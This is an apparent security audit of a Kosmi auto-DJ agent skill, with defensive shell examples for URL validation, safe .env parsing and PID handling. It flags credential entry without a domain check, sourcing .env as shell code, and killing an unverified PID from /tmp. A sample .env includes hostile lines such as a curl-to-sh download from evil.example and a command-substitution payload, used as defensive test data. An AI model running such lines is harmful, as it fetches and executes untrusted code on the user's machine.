kosmi dj
Review. Audited by ClawScan on May 10, 2026.
Overview
This Kosmi automation does mostly what it says, but it needs review because it can use your login/session, runs whatever its .env file contains as shell code, and keeps controlling a room in a long-running loop.
Install only if you are comfortable letting an automated browser control your Kosmi room. Use a dedicated Kosmi account if possible, verify that the room URL really points at Kosmi before storing credentials, protect the .env file, install agent-browser from a trusted source at a pinned version, and stop any DJ loop manually when you are finished.
Findings (5)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
If the room URL is mistyped, changed, or malicious, the agent could type the user's Kosmi credentials into the wrong page.
The script opens the user-configured URL and then fills Kosmi email/password fields if it sees matching inputs. The artifacts do not show a host/domain validation step before credentials are entered.
ab open "$KOSMI_ROOM_URL"
...
ab fill "$EMAIL_BOX" "$KOSMI_EMAIL"
...
ab fill "$PASS_BOX" "$KOSMI_PASSWORD"
Validate that KOSMI_ROOM_URL is on the expected Kosmi domain before filling credentials, prompt before the first login, and prefer a dedicated Kosmi account or an encrypted persistent session over storing a password.
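The host check this finding asks for, as an added example written for this review; it is not code from the kosmi dj skill or from ClawScan. It assumes the legitimate Kosmi host is app.kosmi.io (override KOSMI_HOST otherwise) and that `ab open`/`ab fill` are the agent-browser calls shown in the evidence. The check is deliberately strict: only https, only an exact host match, with userinfo, port, path, query and fragment stripped first so that app.kosmi.io@evil.example and app.kosmi.io.evil.example are both rejected.

```shell
# Added example, not code from the kosmi dj skill or from ClawScan: gate the login
# on the room URL's host. ASSUMPTION: the legitimate Kosmi host is app.kosmi.io;
# set KOSMI_HOST if the room lives on a different Kosmi host.
KOSMI_HOST="${KOSMI_HOST:-app.kosmi.io}"

# url_host URL: print the lower-cased host of an https URL with userinfo, port,
# path, query and fragment removed. Fails (prints nothing) for any other scheme.
url_host() {
    lower=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    case $lower in
        https://*) ;;
        *) return 1 ;;
    esac
    # strip scheme, then everything from the first / ? or #, then userinfo, then port
    printf '%s\n' "$lower" | sed -e 's|^https://||' -e 's|[/?#].*$||' -e 's|^.*@||' -e 's|:.*$||'
}

# kosmi_url_ok URL: true only for an https URL whose host is exactly KOSMI_HOST.
# Hosts such as app.kosmi.io.evil.example or app.kosmi.io@evil.example are rejected.
kosmi_url_ok() {
    host=$(url_host "$1") || return 1
    [ -n "$host" ] && [ "$host" = "$KOSMI_HOST" ]
}

# login_guard URL: the check to run before `ab open` and `ab fill`; refuses with a
# message instead of typing KOSMI_EMAIL/KOSMI_PASSWORD into an unexpected page.
login_guard() {
    if kosmi_url_ok "$1"; then
        return 0
    fi
    printf 'refusing to log in: %s is not an https URL on %s\n' "$1" "$KOSMI_HOST" >&2
    return 1
}

# Illustrative placement in the skill (hypothetical):
#   login_guard "$KOSMI_ROOM_URL" && ab open "$KOSMI_ROOM_URL"
# Run this file directly with URLs as arguments to see the verdicts.
for u in "$@"; do
    if kosmi_url_ok "$u"; then echo "ok      $u"; else echo "REJECT  $u"; fi
done
```

The check runs on the configured string only; it cannot see where the browser ends up after redirects, which is one more reason to prompt before the first login rather than filling the form unattended.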
Commands placed in the .env file would run automatically when the skill is invoked, so a tampered or copied .env could execute local shell commands.
The script sources the .env file as shell code rather than parsing only key/value pairs. The same pattern appears in the other scripts.
if [[ -f "$ENV_FILE" ]]; then
  set -a
  source "$ENV_FILE"
  set +a
fi
Use a safe .env parser, keep the file skill-specific, restrict its permissions (for example mode 600, owned by the user running the skill), and do not paste untrusted content into the .env file.
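A parser that treats .env as data, as an added example written for this review rather than the skill's own code. It accepts only KEY=VALUE lines, exports values literally (so `$(...)`, backticks and `;` in a value are never executed), rejects any other line, and refuses a file that group or others can read. The sample .env it writes is constructed for the demonstration and carries the kind of lines a tampered copy could contain; the KOSMI_* names come from the evidence above, the hostile lines and the helper names are assumptions.

```shell
# Added example, not code from the kosmi dj skill or from ClawScan: load .env as
# KEY=VALUE data instead of `source`-ing it as shell code.

# env_file_private FILE: reject files readable by group or others (e.g. mode 644).
env_file_private() {
    [ -f "$1" ] || return 1
    [ -z "$(find "$1" \( -perm -040 -o -perm -004 \) -print 2>/dev/null)" ]
}

# load_env FILE: export every valid KEY=VALUE line; return 1 if any line was rejected.
# Values are assigned literally: no expansion, no command substitution.
load_env() {
    file=$1
    status=0
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in
            ''|'#'*) continue ;;              # blank lines and comments
        esac
        key=${line%%=*}
        val=${line#*=}
        if [ "$key" = "$line" ]; then        # no '=' at all: not a KEY=VALUE line
            printf 'load_env: rejected line: %s\n' "$line" >&2
            status=1
            continue
        fi
        case $key in
            ''|[0-9]*|*[!A-Za-z0-9_]*)        # key must match [A-Za-z_][A-Za-z0-9_]*
                printf 'load_env: rejected key: %s\n' "$key" >&2
                status=1
                continue ;;
        esac
        # Strip one pair of surrounding quotes; whatever is inside stays literal.
        case $val in
            \"*\") val=${val#\"}; val=${val%\"} ;;
            \'*\') val=${val#\'}; val=${val%\'} ;;
        esac
        export "$key=$val"
    done < "$file"
    return "$status"
}

# make_sample_env: write a constructed .env (including hostile lines) to a private
# temp file and print its path. With `source`, line 3 would run `touch` and the
# last line would pipe a download into sh; with load_env neither happens.
make_sample_env() {
    f=$(mktemp) || return 1
    chmod 600 "$f"
    cat > "$f" <<'EOF'
# constructed sample, not a real Kosmi account
KOSMI_EMAIL=dj@example.com
KOSMI_PASSWORD="s3cret$(touch "$HOME/pwned")"
KOSMI_ROOM_URL="https://app.kosmi.io/room/abc123"
EVIL=`id`
curl https://evil.example/x | sh
EOF
    printf '%s\n' "$f"
}

# Illustrative replacement for the skill's `set -a; source "$ENV_FILE"; set +a`:
#   env_file_private "$ENV_FILE" && load_env "$ENV_FILE" || exit 1
```

A non-zero return from load_env is the signal to stop rather than continue with a partially loaded file: a line the parser cannot classify is exactly the line a careful operator should look at before running anything.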
A stale or tampered PID file could cause the script to stop an unrelated local process when the DJ loop starts.
The loop uses a predictable /tmp PID file and kills whatever PID is stored there without verifying that it belongs to this skill's own loop process. Because /tmp is shared and world-writable, a stale file left by an earlier run, or one planted by another local user before the skill first runs, is trusted in the same way.
PID_FILE="/tmp/kosmi-dj-loop.pid"
...
OLD_PID="$(cat "$PID_FILE" 2>/dev/null)" || true
...
kill "$OLD_PID" 2>/dev/null || true
Store runtime files in a private user-owned directory, use locking, and verify the target process command/session before sending kill signals.
If started, the skill can keep controlling the Kosmi room after the initial request until the user stops it.
The DJ mode is an indefinite loop that keeps selecting and playing videos until interrupted; this is disclosed and central to the auto-DJ purpose.
while true; do
  # Get next video
  NEXT_URL="$(next_video)"
Start loop mode only intentionally, monitor the status/PID file, and stop it when the watch party is over.
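One way to handle the PID file, the lock, and the stop step for the indefinite loop from the two findings above, as an added example written for this review; it is not the skill's own code. It assumes the loop runs under a command line containing "kosmi-dj-loop" (LOOP_TAG), that /proc or `ps -p PID -o args=` is available to read a process's command line, and that the per-iteration work is passed in as a command (the skill's own next_video/play step is not reproduced). Runtime files live in a private per-user directory instead of /tmp, the lock is an atomic mkdir, and stop_loop kills nothing unless the recorded PID is alive and running the tagged command.

```shell
# Added example, not code from the kosmi dj skill or from ClawScan: private runtime
# state, an mkdir lock, and a stop routine that verifies its target before signalling.
# ASSUMPTIONS: the loop's command line contains LOOP_TAG; /proc or ps(1) is available.
RUN_DIR="${XDG_RUNTIME_DIR:-${TMPDIR:-/tmp}}/kosmi-dj-$(id -u)"
PID_FILE="$RUN_DIR/loop.pid"
LOCK_DIR="$RUN_DIR/loop.lock"
LOOP_TAG="${LOOP_TAG:-kosmi-dj-loop}"

run_dir_init() {
    mkdir -p "$RUN_DIR" && chmod 700 "$RUN_DIR"
}

# pid_cmdline PID: print the command line of a live process we are allowed to signal.
pid_cmdline() {
    kill -0 "$1" 2>/dev/null || return 1
    if [ -r "/proc/$1/cmdline" ]; then
        tr '\0' ' ' < "/proc/$1/cmdline"
    else
        ps -p "$1" -o args= 2>/dev/null
    fi
}

# pid_is_ours PID: true only if PID is numeric, alive, and running our loop command.
pid_is_ours() {
    case $1 in ''|*[!0-9]*) return 1 ;; esac
    args=$(pid_cmdline "$1") || return 1
    case $args in *"$LOOP_TAG"*) return 0 ;; *) return 1 ;; esac
}

# stop_loop: signal the recorded PID only after verifying it. A stale or foreign
# PID is reported and the file discarded; nothing is killed.
stop_loop() {
    [ -f "$PID_FILE" ] || { echo "stop_loop: no loop recorded" >&2; return 0; }
    old=$(cat "$PID_FILE" 2>/dev/null)
    if pid_is_ours "$old"; then
        kill "$old" && rm -f "$PID_FILE"
    else
        echo "stop_loop: refusing to kill pid '$old' (stale, or not a $LOOP_TAG process)" >&2
        rm -f "$PID_FILE"
        return 1
    fi
}

acquire_lock() { mkdir "$LOCK_DIR" 2>/dev/null; }      # atomic: fails if already held
release_lock() { rmdir "$LOCK_DIR" 2>/dev/null; }
cleanup_loop() { release_lock || :; rm -f "$PID_FILE"; }

# dj_loop MAX_ITER CMD...: run CMD once per iteration under the lock, recording our PID.
# MAX_ITER=0 runs until stop_loop or Ctrl-C ends it, like the skill's `while true`.
dj_loop() {
    max=$1; shift
    run_dir_init || return 1
    acquire_lock || { echo "dj_loop: another loop holds $LOCK_DIR" >&2; return 1; }
    trap cleanup_loop EXIT
    trap 'cleanup_loop; exit 1' INT TERM
    printf '%s\n' "$$" > "$PID_FILE"
    n=0
    while [ "$max" -eq 0 ] || [ "$n" -lt "$max" ]; do
        "$@" || { echo "dj_loop: step failed, stopping" >&2; cleanup_loop; return 1; }
        n=$((n + 1))
    done
    cleanup_loop
}

# Illustrative use (hypothetical): start with `dj_loop 0 play_next_video`, stop with `stop_loop`.
```

The verification is on the command line, not on the PID alone: PIDs are reused, so a file from yesterday's loop can point at a process that is alive today and belongs to something else entirely, which is the case stop_loop refuses.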
The external package has substantial browser control, so users must trust the installed agent-browser version.
The skill depends on an external browser-automation CLI installed globally, but no pinned install spec or reviewed dependency version is provided.
`agent-browser` CLI installed and on PATH (`npm install -g agent-browser` or available in the environment)
Install agent-browser only from a trusted source, pin and document the expected version, and declare required binaries such as agent-browser and jq in metadata.
